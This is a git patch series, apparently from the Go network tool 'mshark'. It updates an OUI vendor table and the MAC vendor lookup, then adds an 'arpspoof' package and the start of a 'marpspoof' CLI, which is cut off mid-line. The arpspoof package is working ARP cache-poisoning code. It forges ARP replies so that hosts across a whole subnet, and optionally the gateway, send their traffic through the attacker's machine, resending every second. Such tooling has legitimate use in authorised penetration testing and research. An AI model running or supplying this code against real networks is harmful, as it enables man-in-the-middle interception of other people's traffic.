-MA-L,98A965,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,EC7427,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,C8E306,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,78D6D6,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,D43F32,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,A08E24,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,74427F,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,1CED6F,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,485D35,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,B42046,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,C03653,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,D405DE,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,9C0B05,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,74427F,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 -MA-L,1CED6F,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,7C49CF,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,242D6C,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,303A4A,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,DC69B5,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,B4FC7D,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 +MA-L,98A965,AVM Audiovisuelles Marketing und Computersysteme GmbH,Alt-Moabit 95 Berlin Berlin DE 10559 MA-L,5CA5BC,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,A8B088,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,B4E53E,Ruckus Wireless,350 West Java Drive Sunnyvale CA US 94089 MA-L,886746,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,24F3E3,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,E4197F,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,FC3D73,eero inc.,660 3rd Street San Francisco CA US 94107 MA-L,1479F3,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,3C574F,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,00CFC0,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,4062EA,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,E0456D,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,508CF5,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,E4C0CC,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,C01692,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,00E22C,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,E0E0C2,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,782E56,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " -MA-L,946DAE,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " -MA-L,FC6A1C,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " -MA-L,A088C2,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " -MA-L,7C49CF,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,242D6C,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,303A4A,eero inc.,660 3rd Street San Francisco CA US 94107 -MA-L,DC69B5,eero inc.,660 3rd Street San Francisco CA US 94107 +MA-L,00CFC0,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,4062EA,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,E0456D,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,508CF5,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,5C75C6,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,241281,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,64C582,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,448EEC,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " +MA-L,946DAE,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " +MA-L,FC6A1C,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " +MA-L,A088C2,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,E09D73,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " MA-L,5000E6,"Mellanox Technologies, Inc.","350 Oakmead Parkway, Suite 100 Sunnyvale CA US 94085 " -MA-L,448EEC,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,50CF56,"China Mobile Group Device Co.,Ltd.","32 Xuanwumen West Street,Xicheng District Beijing CN 100053 " MA-L,C82478,Edifier International,"Suit 2207, 22nd floor, Tower II, Lippo centre, 89 Queensway Hong Kong CN 070 " -MA-L,F8F295,Annapurna labs,"Matam Scientific Industries Center, Building 8.2 Mail box 15123 Haifa IL 3508409 " +MA-L,D4A0FB,IEEE Registration Authority,445 Hoes Lane Piscataway NJ US 08554 MA-L,E0426D,"GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD","NO.18 HAIBIN ROAD, DONG GUAN GUANG DONG CN 523860 " +MA-L,F8F295,Annapurna labs,"Matam Scientific Industries Center, Building 8.2 Mail box 15123 Haifa IL 3508409 " MA-L,80030D,CANON INC.,"30-2 Shimomaruko 3-chome, Ohta-ku Tokyo JP 146-8501 " -MA-L,D4A0FB,IEEE Registration Authority,445 Hoes Lane Piscataway NJ US 08554 MA-L,18C1E2,Qolsys Inc.,1919 S Bascom Ave Suit 600 Campbell CA US 95008 MA-L,F843EF,Xiaomi Communications Co Ltd,"#019, 9th Floor, Building 6, 33 Xi'erqi Middle Road Beijing Haidian District CN 100085 " MA-L,A4FF9F,Xiaomi Communications Co Ltd,"#019, 9th Floor, Building 6, 33 Xi'erqi Middle Road Beijing Haidian District CN 100085 " @@ -37636,54 +37636,54 @@ MA-L,2025CC,Xiaomi Communications Co Ltd,"#019, 9th Floor, Building 6, 33 Xi'erq MA-L,B0F3E9,"PATEO CONNECT (Xiamen) Co., Ltd.","No. 11-29, Fangyang West Road, Xiang’an District Xiamen fujian CN 361115 " MA-L,304AC4,"Barrot Technology Co.,LTD","A1009, Block A, Jia Hua Building, No.9 Shangdisanjie St, Haidian District, beijing beijing CN 100000 " MA-L,647520,zte corporation,"12/F.,zte R&D building ,kejinan Road,Shenzhen,P.R.China shenzhen guangdong CN 518057 " +MA-L,00C84E,Hewlett Packard Enterprise,6280 America Center Dr San Jose CA US 95002 +MA-L,9C139E,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " MA-L,8431A8,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " MA-L,983F66,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " -MA-L,D47AEC,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " MA-L,40A786,TECNO MOBILE LIMITED,"ROOMS 05-15, 13A/F., SOUTH TOWER, WORLD FINANCE CENTRE, HARBOUR CITY, 17 CANTON ROAD, TSIM SHA TSUI, KOWLOON, HONG KONG Hong Kong Hong Kong HK 999077 " -MA-L,9C139E,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " -MA-L,00C84E,Hewlett Packard Enterprise,6280 America Center Dr San Jose CA US 95002 +MA-L,D47AEC,"Funshion Online Technologies Co.,Ltd","2101, Floor 1-2, Building 9, Anzhen Xili District 3, Chaoyang District, Beijing Beijing CN 100029 " MA-L,88DA36,Calix Inc.,2777 Orchard Pkwy San Jose CA US 95131 -MA-L,98171A,"Beijing Xiaomi Mobile Software Co., Ltd","The Rainbow City Office Building, 68 Qinghe Middle Street Haidian District Beijing Beijing CN 100085 " +MA-L,4010ED,G.Tech Technology Ltd.,"No.8,Jinyuan 1st Road,Tangjiawan Town, High-tech Zone Zhuhai Guangdong CN 519085 " MA-L,EC1055,"Beijing Xiaomi Electronics Co.,Ltd",Xiaomi Campus Beijing Beijing CN 100085 MA-L,206EF1,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " +MA-L,98171A,"Beijing Xiaomi Mobile Software Co., Ltd","The Rainbow City Office Building, 68 Qinghe Middle Street Haidian District Beijing Beijing CN 100085 " MA-L,2CDCC1,EM Microelectronic,Rue des Sors 3 Marin-Epagnier Neuchatel CH 2074 MA-L,A49700,"Cisco Systems, Inc",80 West Tasman Drive San Jose CA US 94568 MA-L,944FDB,Nokia,600 March Road Kanata Ontario CA K2K 2E6 MA-L,D853AD,Cisco Meraki,500 Terry A. Francois Blvd San Francisco US 94158 -MA-L,4010ED,G.Tech Technology Ltd.,"No.8,Jinyuan 1st Road,Tangjiawan Town, High-tech Zone Zhuhai Guangdong CN 519085 " +MA-L,30F856,Extreme Networks Headquarters,2121 RDU Center Drive Morrisville US 27560 +MA-L,804005,"Guangdong COROS Sports Technology Co.,Ltd","Room 601 & 701, Bld. 2, No.2, Science and Technology 9 Rd, Songshan Lake Hi-Tech Zone, Dongguan 523808, Guandong, China Dongguan Guangdong CN 523808 " MA-L,68A593,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,A82C89,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,801242,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,B8011F,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,141416,"Hui Zhou Gaoshengda Technology Co.,LTD","No.2,Jin-da Road,Huinan Industrial Park Hui Zhou Guangdong CN 516025 " -MA-L,804005,"Guangdong COROS Sports Technology Co.,Ltd","Room 601 & 701, Bld. 2, No.2, Science and Technology 9 Rd, Songshan Lake Hi-Tech Zone, Dongguan 523808, Guandong, China Dongguan Guangdong CN 523808 " +MA-L,B025AA,AIstone Global Limited,"29/F. , One Exchange Square 8 Connaught Place Centa Hong Kong CN 999077 " MA-L,DC9396,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,18E671,"Apple, Inc.",1 Infinite Loop Cupertino CA US 95014 MA-L,CCEA27,GE Appliances,4000 Buechel Bank Road Louisville KY US 40225 -MA-L,30F856,Extreme Networks Headquarters,2121 RDU Center Drive Morrisville US 27560 MA-L,8C3D16,"Shenzhen Four Seas Global Link Network Technology Co.,Ltd","9/F, Block H, South China Digital Valley, No.1 South China Road, Longhua District, Shenzhen ,China Shenzhen CN 518000 " +MA-L,48F6EE,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " +MA-L,7C31FA,Silicon Laboratories, 400 West Cesar Chavez Austin TX US 78701 MA-L,C08840,"GD Midea Air-Conditioning Equipment Co.,Ltd.","Midea Global Innovation Center,Beijiao Town,Shunde Foshan Guangdong CN 528311 " MA-L,D0C67F,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " MA-L,98F3F6,"HUAWEI TECHNOLOGIES CO.,LTD","No.2 Xin Cheng Road, Room R6,Songshan Lake Technology Park Dongguan CN 523808 " -MA-L,B025AA,AIstone Global Limited,"29/F. , One Exchange Square 8 Connaught Place Centa Hong Kong CN 999077 " MA-L,A039F9,Sagemcom Broadband SAS,"250, route de l'Empereur Rueil Malmaison Cedex hauts de seine FR 92848 " MA-L,B48931,Silicon Laboratories, 400 West Cesar Chavez Austin TX US 78701 +MA-L,105EAE,"New H3C Technologies Co., Ltd","466 Changhe Road, Binjiang District Hangzhou Zhejiang CN 310052 " MA-L,4CADDF,Công ty Cổ phần Thiết bị Công nghiệp GEIC,"52 Lê Đại Hành, phường Lê Đại Hành, quận Hai Bà Trưng Thành phố Hà Nội VN 000084 " MA-L,64CDC2,Amazon Technologies Inc.,P.O Box 8102 Reno NV US 89507 MA-L,4C60AD,Amazon Technologies Inc.,P.O Box 8102 Reno NV US 89507 -MA-L,48F6EE,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " -MA-L,7C31FA,Silicon Laboratories, 400 West Cesar Chavez Austin TX US 78701 +MA-L,08EB21,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,3CA070,Blink by Amazon ,100 Riverpark Drive North Reading MA US 01864 -MA-L,105EAE,"New H3C Technologies Co., Ltd","466 Changhe Road, Binjiang District Hangzhou Zhejiang CN 310052 " +MA-L,E8C913,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " MA-L,24F40A,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " +MA-L,58E4EB,FN-LINK TECHNOLOGY Ltd.,"No.8, Litong Road, Liuyang Economic & Technical Development Zone, Changsha, Hunan,China Changsha Hunan CN 410329 " MA-L,78C11D,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " -MA-L,E8C913,"Samsung Electronics Co.,Ltd","#94-1, Imsoo-Dong Gumi Gyeongbuk KR 730-350 " MA-L,4CA954,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " -MA-L,08EB21,Intel Corporate,"Lot 8, Jalan Hi-Tech 2/3 Kulim Kedah MY 09000 " MA-L,14C24D,"ATW TECHNOLOGY, INC.","1F, No.236 Ba’ai Street, Shulin District New Taipei City TW 23845 " -MA-L,58E4EB,FN-LINK TECHNOLOGY Ltd.,"No.8, Litong Road, Liuyang Economic & Technical Development Zone, Changsha, Hunan,China Changsha Hunan CN 410329 " -MA-L,983A1F,"Google, Inc.",1600 Amphitheatre Parkway Mountain View CA US 94043 MA-L,140589,"Motorola Mobility LLC, a Lenovo Company",222 West Merchandise Mart Plaza Chicago IL US 60654 +MA-L,983A1F,"Google, Inc.",1600 Amphitheatre Parkway Mountain View CA US 94043 MA-L,2C0DCF,Xiaomi Communications Co Ltd,"#019, 9th Floor, Building 6, 33 Xi'erqi Middle Road Beijing Haidian District CN 100085 " MA-L,F847E3,"Shenzhen Skyworth Digital Technology CO., Ltd","4F,Block A, Skyworth?Building, Shenzhen Guangdong CN 518057 " MA-L,089272,Espressif Inc.,"Room 204, Building 2, 690 Bibo Rd, Pudong New Area Shanghai Shanghai CN 201203 " diff --git a/oui/oui.go b/oui/oui.go index 8bee09f..aacdaeb 100644 --- a/oui/oui.go +++ b/oui/oui.go @@ -4,6 +4,7 @@ package oui import ( "bytes" "net" + "strconv" "strings" ) @@ -12,8 +13,17 @@ var ( LocalhostMAC = net.HardwareAddr{0x00, 0x00, 0x00, 0x00, 0x00, 0x00} ) +func outMulticastRange(hw string) bool { + s := strings.ReplaceAll(hw[9:], ":", "") + n, err := strconv.ParseInt(s, 16, 64) + if err != nil || n > 0x7fffff { + return true + } + return false +} + //go:generate mage -v build -func Vendor(s string) string { +func Vendor(s string, full bool) string { s = strings.ReplaceAll(s, ":", "") switch { case len(s) < 6: @@ -29,15 +39,24 @@ func Vendor(s string) string { if id > len(vendors) { return "" } + if full { + return vendorsFull[id] + } return vendors[id] } -// VendorFromMAC returns the hardware vendor of a net.HardwareAddr. +// VendorFromMAC returns the hardware vendor (full name) of a net.HardwareAddr. func VendorFromMAC(hw net.HardwareAddr) string { - return Vendor(hw.String()) + vendor := Vendor(hw.String(), true) + if vendor == "IPv4 Multicast" && outMulticastRange(hw.String()) { + return "" + } + return vendor } -// VendorWithMAC concatenates vendor with MAC address (e.g. Next_01:02:03) +// VendorWithMAC concatenates vendor with MAC address (e.g. Next_01:02:03). +// +// If vendor is not found returns MAC address func VendorWithMAC(hw net.HardwareAddr) string { if bytes.Equal(BroadcastMAC, hw) { return "Broadcast_" + hw.String()[9:] @@ -45,8 +64,11 @@ func VendorWithMAC(hw net.HardwareAddr) string { if bytes.Equal(LocalhostMAC, hw) { return "Localhost_" + hw.String()[9:] } - vendor := Vendor(hw.String()) + vendor := Vendor(hw.String(), false) if vendor != "" { + if vendor == "IPv4 Multicast" && outMulticastRange(hw.String()) { + return hw.String() + } vendor = strings.ReplaceAll(vendor, " ", "_") return vendor + "_" + hw.String()[9:] } From 876471baa2756f5582722b350f62e0a210532c4c Mon Sep 17 00:00:00 2001 From: shadowy-pycoder <35629483+shadowy-pycoder@users.noreply.github.com> Date: Sun, 20 Jul 2025 21:38:44 +0300 Subject: [PATCH 2/3] added arpspoof package and CLI tool, several improvements and refactorings --- arpspoof/arpspoof.go | 424 ++++++++++++++++++++++++++++++++++++++++++ cmd/marpspoof/main.go | 89 +++++++++ cmd/mshark/cli.go | 22 +-- go.mod | 6 + go.sum | 19 ++ mshark.go | 25 --- mshark_test.go | 4 +- network/network.go | 128 +++++++++++++ oui/data.go | 44 ++--- oui/oui.go | 6 +- 10 files changed, 697 insertions(+), 70 deletions(-) create mode 100644 cmd/marpspoof/main.go create mode 100644 network/network.go diff --git a/arpspoof/arpspoof.go b/arpspoof/arpspoof.go index 0248930..10ed79e 100644 --- a/arpspoof/arpspoof.go +++ b/arpspoof/arpspoof.go @@ -1,2 +1,426 @@ // Package arpspoof package arpspoof + +import ( + "errors" + "fmt" + "maps" + "net" + "net/netip" + "os" + "os/exec" + "slices" + "strings" + "sync" + "time" + + "github.com/malfunkt/iprange" + "github.com/mdlayher/packet" + "github.com/rs/zerolog" + "github.com/shadowy-pycoder/mshark/layers" + "github.com/shadowy-pycoder/mshark/network" + "github.com/shadowy-pycoder/mshark/oui" +) + +const ( + protocolARP = 0x0806 + unixEthPAll = 0x03 +) + +var ( + probeThrottling = 50 * time.Millisecond + probeTargetsInterval = 60 * time.Second + refreshARPTableInterval = 15 * time.Second + arpSpoofTargetsInterval = 1 * time.Second +) + +type Packet struct { + addr net.HardwareAddr + data []byte +} + +type ARPSpoofConfig struct { + Targets string + Gateway *netip.Addr + Interface string + FullDuplex bool + Logger *zerolog.Logger + Debug bool +} + +type ARPTable struct { + sync.RWMutex + Ifname string + Entries map[string]net.HardwareAddr +} + +func (at *ARPTable) String() string { + var sb strings.Builder + + at.RLock() + defer at.RUnlock() + for _, k := range slices.Sorted(maps.Keys(at.Entries)) { + sb.WriteString(fmt.Sprintf("%s (%s), ", k, oui.VendorWithMAC(at.Entries[k]))) + } + return strings.TrimRight(sb.String(), ", ") +} + +func (at *ARPTable) Get(ip netip.Addr) (net.HardwareAddr, bool) { + at.RLock() + defer at.RUnlock() + hw, ok := at.Entries[ip.String()] + return hw, ok +} + +func (at *ARPTable) Set(ip netip.Addr, hw net.HardwareAddr) { + at.Lock() + at.Entries[ip.String()] = hw + at.Unlock() +} + +func (at *ARPTable) Delete(ip netip.Addr) { + at.Lock() + delete(at.Entries, ip.String()) + at.Unlock() +} + +func (at *ARPTable) Refresh() error { + at.Lock() + defer at.Unlock() + cmd := exec.Command("sh", "-c", "ip -br neigh") + out, err := cmd.Output() + if err != nil { + return err + } + clear(at.Entries) + for line := range strings.Lines(string(out)) { + fields := strings.Fields(line) + if len(fields) < 3 { + continue + } + if fields[1] != at.Ifname { + continue + } + ip, err := netip.ParseAddr(fields[0]) + if err != nil { + return err + } + hw, err := net.ParseMAC(fields[2]) + if err != nil { + return err + } + at.Entries[ip.String()] = hw + } + return nil +} + +type ARPSpoofer struct { + targets []netip.Addr + gwIP netip.Addr + gwMAC net.HardwareAddr + iface *net.Interface + hostIP netip.Addr + hostMAC net.HardwareAddr + fullduplex bool + arpTable *ARPTable + packets chan *Packet + logger *zerolog.Logger + quit chan bool + wg sync.WaitGroup + p *packet.Conn +} + +func NewARPSpoofer(conf *ARPSpoofConfig) (*ARPSpoofer, error) { + arpspoofer := &ARPSpoofer{} + // determining interface + iface, err := network.GetDefaultInterface() + if err != nil { + return nil, err + } + if conf.Interface != "" { + arpspoofer.iface, err = net.InterfaceByName(conf.Interface) + if err != nil { + return nil, err + } + } else { + arpspoofer.iface = iface + } + prefix, err := network.GetIPv4PrefixFromInterface(arpspoofer.iface) + if err != nil { + return nil, err + } + arpspoofer.hostIP = prefix.Addr() + arpspoofer.hostMAC = arpspoofer.iface.HardwareAddr + arpspoofer.arpTable = &ARPTable{Ifname: arpspoofer.iface.Name, Entries: make(map[string]net.HardwareAddr)} + err = arpspoofer.arpTable.Refresh() + if err != nil { + return nil, err + } + if conf.Gateway != nil && conf.Gateway.IsValid() && conf.Gateway.Is4() { + // TODO: find out why custom gateway may be useful + arpspoofer.gwIP = *conf.Gateway + } else { + var gwIP netip.Addr + if arpspoofer.iface.Name != iface.Name { + gwIP, err = network.GetGatewayIPv4FromInterface(arpspoofer.iface.Name) + if err != nil { + return nil, fmt.Errorf("failed fetching gateway ip: %w", err) + } + } else { + gwIP, err = network.GetDefaultGatewayIPv4() + if err != nil { + return nil, fmt.Errorf("failed fetching gateway ip: %w", err) + } + } + arpspoofer.gwIP = gwIP + } + if gwMAC, ok := arpspoofer.arpTable.Get(arpspoofer.gwIP); !ok { + probeIP(arpspoofer.gwIP) + time.Sleep(probeThrottling) + err = arpspoofer.arpTable.Refresh() + if err != nil { + return nil, err + } + if gwMAC, ok := arpspoofer.arpTable.Get(arpspoofer.gwIP); !ok { + return nil, fmt.Errorf("failed fetching gateway MAC") + } else { + arpspoofer.gwMAC = gwMAC + } + } else { + arpspoofer.gwMAC = gwMAC + } + // parsing targets list + if conf.Targets == "" { + // defaults to subnet + conf.Targets = prefix.String() + } + list, err := iprange.ParseList(conf.Targets) + if err != nil { + return nil, err + } + normalizedList := list.Expand() + targets := make([]netip.Addr, 0, len(normalizedList)) + for _, ipb := range normalizedList { + ip, ok := netip.AddrFromSlice(ipb) + if !ok { + return nil, fmt.Errorf("failed parsing list of targets") + } + // remove invalid addresses (sanity check) + if !ip.IsValid() || !ip.Is4() { + continue + } + // remove addresses that do not belong to subnet + if !prefix.Contains(ip) { + continue + } + // remove host from targets + if ip.Compare(arpspoofer.hostIP) == 0 { + continue + } + // remove gateway from targets + if ip.Compare(arpspoofer.gwIP) == 0 { + continue + } + // remove broadcast ip from targets + if strings.HasSuffix(ip.String(), ".255") { + continue + } + targets = append(targets, ip) + } + if len(targets) == 0 { + return nil, fmt.Errorf("list of targets is empty") + } + arpspoofer.targets = targets + arpspoofer.fullduplex = conf.FullDuplex + arpspoofer.packets = make(chan *Packet) + arpspoofer.quit = make(chan bool) + arpspoofer.p, err = packet.Listen(arpspoofer.iface, packet.Raw, unixEthPAll, nil) + if err != nil { + if errors.Is(err, os.ErrPermission) { + return nil, fmt.Errorf("permission denied (try setting CAP_NET_RAW capability): %v", err) + } + return nil, fmt.Errorf("failed to listen: %v", err) + } + // setting up logger + zerolog.SetGlobalLevel(zerolog.InfoLevel) + if conf.Debug { + zerolog.SetGlobalLevel(zerolog.DebugLevel) + } + if conf.Logger != nil { + arpspoofer.logger = conf.Logger + } else { + logger := zerolog.New(os.Stdout).With().Timestamp().Logger() + arpspoofer.logger = &logger + } + return arpspoofer, nil +} + +func (ar *ARPSpoofer) Start() { + ar.logger.Info().Msg("[arp spoofer] Started") + go ar.handlePackets() + ar.logger.Debug().Msgf("[arp spoofer] Probing %d targets", len(ar.targets)) + ar.probeTargetsOnce() + ar.logger.Debug().Msg("[arp spoofer] Refreshing ARP table") + ar.arpTable.Refresh() + ar.logger.Info().Msgf("[arp spoofer] Detected targets: %s", ar.arpTable) + go ar.probeTargets() + go ar.refreshARPTable() + ar.wg.Add(1) + for { + select { + case <-ar.quit: + ar.wg.Done() + return + default: + ar.spoofTargets() + time.Sleep(arpSpoofTargetsInterval) + } + } +} + +func (ar *ARPSpoofer) Stop() error { + var err error + ar.logger.Info().Msg("[arp spoofer] Stopping...") + close(ar.quit) + ar.wg.Wait() + err = ar.unspoofTargets() + close(ar.packets) + ar.logger.Info().Msg("[arp spoofer] Stopped") + return err +} + +func doProbe(ip netip.Addr) error { + // TODO: add manual packet crafting + ping := exec.Command("sh", "-c", fmt.Sprintf("ping -c1 -t1 -w1 %s", ip)) + if err := ping.Start(); err != nil { + return err + } + if err := ping.Wait(); err != nil { + return err + } + return nil +} + +func probeIP(ip netip.Addr) error { + return doProbe(ip) +} + +func (ar *ARPSpoofer) probeTargetsOnce() { + var wg sync.WaitGroup + for _, ip := range ar.targets { + wg.Add(1) + go func(ip netip.Addr) { + defer wg.Done() + doProbe(ip) + }(ip) + time.Sleep(probeThrottling) + } + wg.Wait() +} + +func (ar *ARPSpoofer) probeTargets() { + ar.wg.Add(1) + t := time.NewTicker(probeTargetsInterval) + var wg sync.WaitGroup + for { + select { + case <-ar.quit: + ar.wg.Done() + return + case <-t.C: + ar.logger.Debug().Msgf("[arp spoofer] Probing %d targets", len(ar.targets)) + for _, ip := range ar.targets { + wg.Add(1) + go func(ip netip.Addr) { + defer wg.Done() + doProbe(ip) + }(ip) + time.Sleep(probeThrottling) + } + wg.Wait() + } + } +} + +func (ar *ARPSpoofer) refreshARPTable() { + ar.wg.Add(1) + t := time.NewTicker(refreshARPTableInterval) + for { + select { + case <-ar.quit: + ar.wg.Done() + return + case <-t.C: + ar.logger.Debug().Msg("[arp spoofer] Refreshing ARP table") + ar.arpTable.Refresh() + ar.logger.Info().Msgf("[arp spoofer] Detected targets: %s", ar.arpTable) + } + } +} + +func (ar *ARPSpoofer) writePacket(p *Packet) (int, error) { + return ar.p.WriteTo(p.data, &packet.Addr{HardwareAddr: p.addr}) +} + +func (ar *ARPSpoofer) handlePackets() { + for p := range ar.packets { + _, err := ar.writePacket(p) + if err != nil { + ar.logger.Debug().Msg(err.Error()) + } + } +} + +func (ar *ARPSpoofer) newARPReply(srcMAC, dstMAC net.HardwareAddr, srcIP, dstIP netip.Addr) (*Packet, error) { + arp, err := layers.NewARPPacket(layers.OperationReply, srcMAC, srcIP, dstMAC, dstIP) + if err != nil { + ar.logger.Debug().Msg(err.Error()) + return nil, err + } + eth, err := layers.NewEthernetFrame(dstMAC, srcMAC, layers.EtherTypeARP, arp.ToBytes()) + if err != nil { + ar.logger.Debug().Msg(err.Error()) + return nil, err + } + return &Packet{addr: dstMAC, data: eth.ToBytes()}, nil +} + +func (ar *ARPSpoofer) spoofTargets() { + for _, targetIP := range ar.targets { + if targetMAC, ok := ar.arpTable.Get(targetIP); !ok { + continue + } else { + ap, err := ar.newARPReply(ar.hostMAC, targetMAC, ar.gwIP, targetIP) + if err != nil { + continue + } + ar.logger.Debug().Msgf("[arp spoofer] Sending %d bytes of ARP packet to %s (%s)", len(ap.data), targetIP, oui.VendorWithMAC(targetMAC)) + ar.packets <- ap + } + if ar.fullduplex { + ap, err := ar.newARPReply(ar.hostMAC, ar.gwMAC, targetIP, ar.gwIP) + if err != nil { + continue + } + ar.logger.Debug().Msgf("[arp spoofer] Telling %s (%s) we are %s", ar.gwIP, oui.VendorWithMAC(ar.gwMAC), targetIP) + ar.packets <- ap + } + } +} + +func (ar *ARPSpoofer) unspoofTargets() error { + ar.logger.Info().Msgf("[arp spoofer] Restoring ARP cache of %d targets", len(ar.targets)) + for _, targetIP := range ar.targets { + if targetMAC, ok := ar.arpTable.Get(targetIP); !ok { + continue + } else { + ar.logger.Debug().Msgf("[arp spoofer] Restoring ARP cache of %s (%s)", targetIP, oui.VendorWithMAC(targetMAC)) + ap, err := ar.newARPReply(targetMAC, ar.gwMAC, targetIP, ar.gwIP) + if err != nil { + return err + } + ar.packets <- ap + } + } + return nil +} diff --git a/cmd/marpspoof/main.go b/cmd/marpspoof/main.go new file mode 100644 index 0000000..ec6541e --- /dev/null +++ b/cmd/marpspoof/main.go @@ -0,0 +1,89 @@ +package main + +import ( + "flag" + "fmt" + "net/netip" + "os" + "os/signal" + "regexp" + "time" + + "github.com/rs/zerolog" + "github.com/shadowy-pycoder/colors" + "github.com/shadowy-pycoder/mshark/arpspoof" + "github.com/shadowy-pycoder/mshark/network" +) + +var ( + app = "marpspoof" + ipPortPattern = regexp.MustCompile( + 